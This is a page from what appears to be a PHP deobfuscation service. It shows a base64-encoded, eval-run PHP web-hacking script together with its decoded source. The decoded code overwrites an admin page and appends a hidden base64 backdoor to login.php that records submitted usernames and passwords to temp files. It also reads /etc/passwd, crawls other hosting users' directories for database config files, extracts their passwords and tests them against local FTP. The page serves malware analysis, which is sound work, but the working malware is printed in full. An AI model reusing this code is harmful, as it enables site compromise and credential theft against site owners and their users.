Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php #######Shadow########################### $rhs = "ZWNobyAiPGh0bWw+IjsNCmVjaG8gIjx0a..
Decoded Output download
echo "<html>";
echo "<title>Shadow was Here</title><body>";
set_time_limit(0);
$system_uname = php_uname();
$system_pwd = getcwd();
#####################
$pwd_admin = ereg_replace('/images','/admin', $system_pwd);
if (chdir($pwd_admin)) {
if (is_writable($pwd_admin)) {
if (is_writable('categories.php')) {
unlink('categories.php');
$new_categories = "<?php header(location:'http://www.google.com'); ?>";
$patch_categories = fopen('categories.php','w');
$write_categories = fwrite('categories.php',"$new_categories");
$response_categories= "[-] Categories Patched";
}
else { $response_categories = "[-] Unable to patch Categories"; }
if (is_writable('login.php')) {
$backdoor_login = "<?php eval(base64_decode('aWYgKCRIVFRQX1BPU1RfVkFSU1sndXNlcm5hbWUnXSkgew0KCQ0KCSR3cml0ZSA9ICgkSFRUUF9QT1NUX1ZBUlNbJ3VzZXJuYW1lJ10pOw0KCXBhc3Nfd3JpdGUoJHdyaXRlKTsNCn0NCmlmICgkSFRUUF9QT1NUX1ZBUlNbJ3Bhc3N3b3JkJ10pIHsNCgkkd3JpdGUgPSAkSFRUUF9QT1NUX1ZBUlNbJ3Bhc3N3b3JkJ107DQoJcGFzc193cml0ZSgkd3JpdGUpOw0KfQ0KZnVuY3Rpb24gcGFzc193cml0ZSgkd3JpdGUpIHsNCglpZiAoaXNfd3JpdGFibGUoJy90bXAnKSkgew0KCQkkcGFzc19maWxlID0gZm9wZW4oJ3Bhc3N3ZC50eHQnLCJhKyIpOw0KCQkkcGFzc193cml0ZT0gZndyaXRlKCRwYXNzX2ZpbGUsICIkd3JpdGUiKTsNCgl9DQoJZWxzZWlmKGlzX3dyaXRhYmxlKCcvdmFyL3RtcCcpKSB7DQoJCSRwYXNzX2ZpbGUgPSBmb3BlbigncGFzc3dkLnR4dCcsImErIik7DQoJCSRwYXNzX3dyaXRlPSBmd3JpdGUoJHBhc3NfZmlsZSwgJHdyaXRlKTsNCgl9DQoJZWxzZWlmKGlzX3dyaXRhYmxlKCdkZXYvc2htJykpIHsNCgkJJHBhc3NfZmlsZSA9IGZvcGVuKCcvZGV2L3NobS9wYXNzd2QudHh0JywiYSsiKTsNCgkJJHBhc3Nfd3JpdGU9IGZ3cml0ZSgnJHBhc3NfZmlsZScsICIkd3JpdGUiKTsNCgl9DQp9'); ?>";
$add_on_login = fopen('login.php','a+');
$write_login = fwrite('login.php',$backdoor_login);
$response_login = "[-] Put backdoor on Login";
}
else { $response_login = "[-] Unable To put backdoor on Login"; }
}
}
#####################################
###Bjork##
@$passwd=fopen('/etc/passwd','r');
if (!$passwd) {
echo "[-] Error : Unable to open /etc/passwd";
}
$path_to_public=array();
$users=array();
$pathtoconf=array();
$i=0;
while(!feof($passwd)) {
$str=fgets($passwd);
if ($i>35) {
$pos=strpos($str,":");
$username=substr($str,0,$pos);
$dirz="/home/$username/public_html/";
if (($username!="")) {
if (is_readable($dirz)) {
array_push($users,$username);
array_push($path_to_public,$dirz);
}
}
}
$i++;
}
###################
#########################
echo "<br><br>";
echo "<textarea name='main_window' cols=100 rows=20>";
echo "[+] Founded ".sizeof($users)." entries in /etc/passwd
";
echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories
";
echo "[~] Searching for passwords in config.* files...
";
echo "$response_work_dir
";
echo "$response_login
";
echo "$response_categories
";
echo "$response_bot
";
foreach ($users as $user) {
$path="/home/$user/public_html/";
read_dir($path,$user);
}
echo "
[+] Done
";
function read_dir($path,$username) {
if ($handle = opendir($path)) {
while (false !== ($file = readdir($handle))) {
$fpath="$path$file";
if (($file!='.') and ($file!='..')) {
if (is_readable($fpath)) {
$dr="$fpath/";
if (is_dir($dr)) {
read_dir($dr,$username);
}
else {
if (($file=='config.php') or ($file=='e107_config.php') or ($file=='header.inc.php') or ($file=='content.inc.php') or ($file=='mainfile.php') or ($file=='utils.inc.php') or ($file=='main.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='e107_config.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='configuration.php') or ($file=='configurations.php') or ($file=='configs.php') or ($file=='config.locale.php') or ($file=='db.inc.php') or ($file=='dbconnect.inc.php') or ($file=='dbconnection.php') or ($file=='var.php') or ($file=='mysql.php') or ($file=='global.inc.php') or ($file=='database.php') or ($file=='dbconnect.php') or ($file=='conf.php') or ($file=='configDB.inc.php') or ($file=='db.php') or ($file=='db_connect.php')) {
$pass=get_pass($fpath);
if ($pass!='') {
echo "[+] $fpath
$pass
";
ftp_check($username,$pass);
}
}
}
}
}
}
}
}
function get_pass($link) {
@$config=fopen($link,'r');
while(!feof($config)) {
$line=fgets($config);
if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) {
if (strrpos($line,'"'))
$pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
else
$pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
return $pass;
}
}
}
function ftp_check($login,$pass) {
@$ftp=ftp_connect('127.0.0.1');
if ($ftp) {
@$res=ftp_login($ftp,$login,$pass);
if ($res) {
echo '[FTP] '.$login.':'.$pass." Success
";
}
else ftp_quit($ftp);
}
}
echo "</textarea><br>";
echo "</body></html>";
Did this file decode correctly?
Original Code
<?php
#######Shadow###########################
$rhs = "ZWNobyAiPGh0bWw+IjsNCmVjaG8gIjx0aXRsZT5TaGFkb3cgd2FzIEhlcmU8L3RpdGxlPjxib2R5PiI7DQpzZXRfdGltZV9saW1pdCgwKTsNCiRzeXN0ZW1fdW5hbWUgPSBwaHBfdW5hbWUoKTsNCiRzeXN0ZW1fcHdkICAgPSBnZXRjd2QoKTsNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KJHB3ZF9hZG1pb
iA9IGVyZWdfcmVwbGFjZSgnL2ltYWdlcycsJy9hZG1pbicsICRzeXN0ZW1fcHdkKTsNCmlmIChjaGRpcigkcHdkX2FkbWluKSkgew0KCWlmIChpc193cml0YWJsZSgkcHdkX2FkbWluKSkgew0KCQlpZiAoaXNfd3JpdGFibGUoJ2NhdGVnb3JpZXMucGhwJykpIHsNCgkJCXVubGluaygnY2F0ZWdvcmllcy5waHAnKT
sNCgkJCSRuZXdfY2F0ZWdvcmllcyAgICAgPSAiPD9waHAgaGVhZGVyKGxvY2F0aW9uOidodHRwOi8vd3d3Lmdvb2dsZS5jb20nKTsgPz4iOw0KCQkJJHBhdGNoX2NhdGVnb3JpZXMgICA9IGZvcGVuKCdjYXRlZ29yaWVzLnBocCcsJ3cnKTsNCgkJCSR3cml0ZV9jYXRlZ29yaWVzICAgPSBmd3JpdGUoJ2NhdGVnb3J
pZXMucGhwJywiJG5ld19jYXRlZ29yaWVzIik7DQoJCQkkcmVzcG9uc2VfY2F0ZWdvcmllcz0gIlstXSBDYXRlZ29yaWVzIFBhdGNoZWQiOw0KCQl9DQoJCWVsc2UgeyAkcmVzcG9uc2VfY2F0ZWdvcmllcyA9ICJbLV0gVW5hYmxlIHRvIHBhdGNoIENhdGVnb3JpZXMiOyB9DQoJCWlmIChpc193cml0YWJsZSgnbG9n
aW4ucGhwJykpIHsNCgkJCSRiYWNrZG9vcl9sb2dpbiA9ICI8P3BocCBldmFsKGJhc2U2NF9kZWNvZGUoJ2FXWWdLQ1JJVkZSUVgxQlBVMVJmVmtGU1Uxc25kWE5sY201aGJXVW5YU2tnZXcwS0NRMEtDU1IzY21sMFpTQTlJQ2drU0ZSVVVGOVFUMU5VWDFaQlVsTmJKM1Z6WlhKdVlXMWxKMTBwT3cwS0NYQmhjM05mZ
DNKcGRHVW9KSGR5YVhSbEtUc05DbjBOQ21sbUlDZ2tTRlJVVUY5UVQxTlVYMVpCVWxOYkozQmhjM04zYjNKa0oxMHBJSHNOQ2dra2QzSnBkR1VnUFNBa1NGUlVVRjlRVDFOVVgxWkJVbE5iSjNCaGMzTjNiM0prSjEwN0RRb0pjR0Z6YzE5M2NtbDBaU2drZDNKcGRHVXBPdzBLZlEwS1puVnVZM1JwYjI0Z2NHRnpjMT
kzY21sMFpTZ2tkM0pwZEdVcElIc05DZ2xwWmlBb2FYTmZkM0pwZEdGaWJHVW9KeTkwYlhBbktTa2dldzBLQ1Fra2NHRnpjMTltYVd4bElEMGdabTl3Wlc0b0ozQmhjM04zWkM1MGVIUW5MQ0poS3lJcE93MEtDUWtrY0dGemMxOTNjbWwwWlQwZ1puZHlhWFJsS0NSd1lYTnpYMlpwYkdVc0lDSWtkM0pwZEdVaUtUc05
DZ2w5RFFvSlpXeHpaV2xtS0dselgzZHlhWFJoWW14bEtDY3ZkbUZ5TDNSdGNDY3BLU0I3RFFvSkNTUndZWE56WDJacGJHVWdQU0JtYjNCbGJpZ25jR0Z6YzNka0xuUjRkQ2NzSW1FcklpazdEUW9KQ1NSd1lYTnpYM2R5YVhSbFBTQm1kM0pwZEdVb0pIQmhjM05mWm1sc1pTd2dKSGR5YVhSbEtUc05DZ2w5RFFvSlpX
eHpaV2xtS0dselgzZHlhWFJoWW14bEtDZGtaWFl2YzJodEp5a3BJSHNOQ2drSkpIQmhjM05mWm1sc1pTQTlJR1p2Y0dWdUtDY3ZaR1YyTDNOb2JTOXdZWE56ZDJRdWRIaDBKeXdpWVNzaUtUc05DZ2tKSkhCaGMzTmZkM0pwZEdVOUlHWjNjbWwwWlNnbkpIQmhjM05mWm1sc1pTY3NJQ0lrZDNKcGRHVWlLVHNOQ2dsO
URRcDknKTsgPz4iOw0KCQkJJGFkZF9vbl9sb2dpbiAgID0gZm9wZW4oJ2xvZ2luLnBocCcsJ2ErJyk7DQoJCQkkd3JpdGVfbG9naW4gICAgPSBmd3JpdGUoJ2xvZ2luLnBocCcsJGJhY2tkb29yX2xvZ2luKTsNCgkJCSRyZXNwb25zZV9sb2dpbiA9ICJbLV0gUHV0IGJhY2tkb29yIG9uIExvZ2luIjsNCgkJCQkJfQ
0KCQllbHNlIHsgJHJlc3BvbnNlX2xvZ2luID0gIlstXSBVbmFibGUgVG8gcHV0IGJhY2tkb29yIG9uIExvZ2luIjsgfQkJCQ0KCX0NCn0NCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KIyMjQmpvcmsjIyANCkAkcGFzc3dkPWZvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKTsNCmlmICghJHB
hc3N3ZCkgew0KICAgZWNobyAiWy1dIEVycm9yIDogVW5hYmxlIHRvIG9wZW4gL2V0Yy9wYXNzd2QiOw0KfQ0KJHBhdGhfdG9fcHVibGljPWFycmF5KCk7DQokdXNlcnM9YXJyYXkoKTsNCiRwYXRodG9jb25mPWFycmF5KCk7DQokaT0wOw0Kd2hpbGUoIWZlb2YoJHBhc3N3ZCkpIHsNCiAgJHN0cj1mZ2V0cygkcGFz
c3dkKTsNCiAgaWYgKCRpPjM1KSB7DQogICAgJHBvcz1zdHJwb3MoJHN0ciwiOiIpOw0KICAgICR1c2VybmFtZT1zdWJzdHIoJHN0ciwwLCRwb3MpOw0KICAgICRkaXJ6PSIvaG9tZS8kdXNlcm5hbWUvcHVibGljX2h0bWwvIjsNCiAgICBpZiAoKCR1c2VybmFtZSE9IiIpKSB7DQogICAgICAgIGlmIChpc19yZWFkY
WJsZSgkZGlyeikpIHsNCiAgICAgICAgICAgIGFycmF5X3B1c2goJHVzZXJzLCR1c2VybmFtZSk7DQogICAgICAgICAgICBhcnJheV9wdXNoKCRwYXRoX3RvX3B1YmxpYywkZGlyeik7DQogICAgICAgIH0NCiAgICB9DQogIH0NCiAgJGkrKzsNCn0NCiMjIyMjIyMjIyMjIyMjIyMjIyMNCiMjIyMjIyMjIyMjIyMjIy
MjIyMjIyMjIyMNCmVjaG8gIjxicj48YnI+IjsNCmVjaG8gIjx0ZXh0YXJlYSBuYW1lPSdtYWluX3dpbmRvdycgY29scz0xMDAgcm93cz0yMD4iOw0KZWNobyAiWytdIEZvdW5kZWQgIi5zaXplb2YoJHVzZXJzKS4iIGVudHJpZXMgaW4gL2V0Yy9wYXNzd2RcbiI7DQplY2hvICJbK10gRm91bmRlZCAiLnNpemVvZig
kcGF0aF90b19wdWJsaWMpLiIgcmVhZGFibGUgcHVibGljX2h0bWwgZGlyZWN0b3JpZXNcbiI7DQplY2hvICJbfl0gU2VhcmNoaW5nIGZvciBwYXNzd29yZHMgaW4gY29uZmlnLiogZmlsZXMuLi5cblxuIjsNCmVjaG8gIiRyZXNwb25zZV93b3JrX2RpclxuIjsNCmVjaG8gIiRyZXNwb25zZV9sb2dpblxuIjsNCmVj
aG8gIiRyZXNwb25zZV9jYXRlZ29yaWVzXG4iOw0KZWNobyAiJHJlc3BvbnNlX2JvdFxuIjsNCmZvcmVhY2ggKCR1c2VycyBhcyAkdXNlcikgew0KICAgICAgICAkcGF0aD0iL2hvbWUvJHVzZXIvcHVibGljX2h0bWwvIjsNCiAgICAgICAgcmVhZF9kaXIoJHBhdGgsJHVzZXIpOw0KfQ0KZWNobyAiXG5bK10gRG9uZ
VxuIjsNCmZ1bmN0aW9uIHJlYWRfZGlyKCRwYXRoLCR1c2VybmFtZSkgew0KICAgIGlmICgkaGFuZGxlID0gb3BlbmRpcigkcGF0aCkpIHsNCiAgICAgICAgd2hpbGUgKGZhbHNlICE9PSAoJGZpbGUgPSByZWFkZGlyKCRoYW5kbGUpKSkgew0KICAgICAgICAgICAgICAkZnBhdGg9IiRwYXRoJGZpbGUiOw0KICAgIC
AgICAgICAgICBpZiAoKCRmaWxlIT0nLicpIGFuZCAoJGZpbGUhPScuLicpKSB7DQogICAgICAgICAgICAgICAgIGlmIChpc19yZWFkYWJsZSgkZnBhdGgpKSB7DQogICAgICAgICAgICAgICAgICAgICRkcj0iJGZwYXRoLyI7DQogICAgICAgICAgICAgICAgICAgIGlmIChpc19kaXIoJGRyKSkgew0KICAgICAgICA
gICAgICAgICAgICAgICByZWFkX2RpcigkZHIsJHVzZXJuYW1lKTsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICBlbHNlIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoKCRmaWxlPT0nY29uZmlnLnBocCcpIG9yICgkZmlsZT09J2UxMDdfY29uZmlnLnBocCcpIG9yICgk
ZmlsZT09J2hlYWRlci5pbmMucGhwJykgb3IgKCRmaWxlPT0nY29udGVudC5pbmMucGhwJykgb3IgKCRmaWxlPT0nbWFpbmZpbGUucGhwJykgb3IgKCRmaWxlPT0ndXRpbHMuaW5jLnBocCcpIG9yICgkZmlsZT09J21haW4ucGhwJykgb3IgKCRmaWxlPT0nY29uZmlnLmluYy5waHAnKSBvciAoJGZpbGU9PSdkYi5pb
mMucGhwJykgb3IgKCRmaWxlPT0nY29ubmVjdC5waHAnKSBvciAoJGZpbGU9PSdlMTA3X2NvbmZpZy5waHAnKSBvciAoJGZpbGU9PSd3cC1jb25maWcucGhwJykgb3IgKCRmaWxlPT0ndmFyLnBocCcpIG9yICgkZmlsZT09J2NvbmZpZ3VyZS5waHAnKSBvciAoJGZpbGU9PSdjb25maWd1cmF0aW9uLnBocCcpIG9yIC
gkZmlsZT09J2NvbmZpZ3VyYXRpb25zLnBocCcpIG9yICgkZmlsZT09J2NvbmZpZ3MucGhwJykgb3IgKCRmaWxlPT0nY29uZmlnLmxvY2FsZS5waHAnKSBvciAoJGZpbGU9PSdkYi5pbmMucGhwJykgb3IgKCRmaWxlPT0nZGJjb25uZWN0LmluYy5waHAnKSBvciAoJGZpbGU9PSdkYmNvbm5lY3Rpb24ucGhwJykgb3I
gKCRmaWxlPT0ndmFyLnBocCcpIG9yICgkZmlsZT09J215c3FsLnBocCcpIG9yICgkZmlsZT09J2dsb2JhbC5pbmMucGhwJykgb3IgKCRmaWxlPT0nZGF0YWJhc2UucGhwJykgb3IgKCRmaWxlPT0nZGJjb25uZWN0LnBocCcpIG9yICgkZmlsZT09J2NvbmYucGhwJykgb3IgKCRmaWxlPT0nY29uZmlnREIuaW5jLnBo
cCcpIG9yICgkZmlsZT09J2RiLnBocCcpIG9yICgkZmlsZT09J2RiX2Nvbm5lY3QucGhwJykpIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGFzcz1nZXRfcGFzcygkZnBhdGgpOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkcGFzcyE9JycpIHsNCiAgICAgICAgICAgICAgICAgICAgI
CAgICAgICAgICBlY2hvICJbK10gJGZwYXRoXG4kcGFzc1xuIjsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmdHBfY2hlY2soJHVzZXJuYW1lLCRwYXNzKTsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgIC
B9DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgIH0gDQogICAgICAgIH0NCiAgICB9DQp9DQpmdW5jdGlvbiBnZXRfcGFzcygkbGluaykgew0KICAgIEAkY29uZmlnPWZvcGVuKCRsaW5rLCdyJyk7DQogICAgd2hpbGUoIWZlb2YoJGNvbmZpZykpIHsNCiAgICAgICAgJGxpbmU9ZmdldHMoJGNvbmZpZyk
7DQogICAgICAgIGlmIChzdHJzdHIoJGxpbmUsJ3Bhc3MnKSBvciBzdHJzdHIoJGxpbmUsJ3Bhc3N3b3JkJykgb3Igc3Ryc3RyKCRsaW5lLCdwYXNzd2QnKSkgew0KICAgICAgICAgICAgaWYgKHN0cnJwb3MoJGxpbmUsJyInKSkNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICRwYXNzPXN1YnN0cigkbGluZSwo
c3RycG9zKCRsaW5lLCc9JykrMyksKHN0cnJwb3MoJGxpbmUsJyInKS0oc3RycG9zKCRsaW5lLCc9JykrMykpKTsNCiAgICAgICAgIGVsc2UNCiAgICAgICAgICAgICAgICRwYXNzPXN1YnN0cigkbGluZSwoc3RycG9zKCRsaW5lLCc9JykrMyksKHN0cnJwb3MoJGxpbmUsIiciKS0oc3RycG9zKCRsaW5lLCc9JykrM
ykpKTsNCiAgICAgICAgICAgIHJldHVybiAkcGFzczsNCiAgICAgICAgfQ0KICAgIH0NCn0NCmZ1bmN0aW9uIGZ0cF9jaGVjaygkbG9naW4sJHBhc3MpIHsNCiAgICAgQCRmdHA9ZnRwX2Nvbm5lY3QoJzEyNy4wLjAuMScpOw0KICAgICBpZiAoJGZ0cCkgew0KICAgICAgICBAJHJlcz1mdHBfbG9naW4oJGZ0cCwkbG
9naW4sJHBhc3MpOw0KICAgICAgICBpZiAoJHJlcykgew0KICAgICAgICAgIGVjaG8gJ1tGVFBdICcuJGxvZ2luLic6Jy4kcGFzcy4iICBTdWNjZXNzXG4iOw0KICAgICAgICB9DQogICAgICAgIGVsc2UgZnRwX3F1aXQoJGZ0cCk7DQogICAgIH0NCn0NCmVjaG8gIjwvdGV4dGFyZWE+PGJyPiI7DQplY2hvICI8L2J
vZHk+PC9odG1sPiI7";
eval(base64_decode($rhs));
##########was######here#################
?>
Function Calls
base64_decode | 1 |
Stats
MD5 | 364c3aacc565b4ace7eddbe33aac9f67 |
Eval Count | 1 |
Decode Time | 92 ms |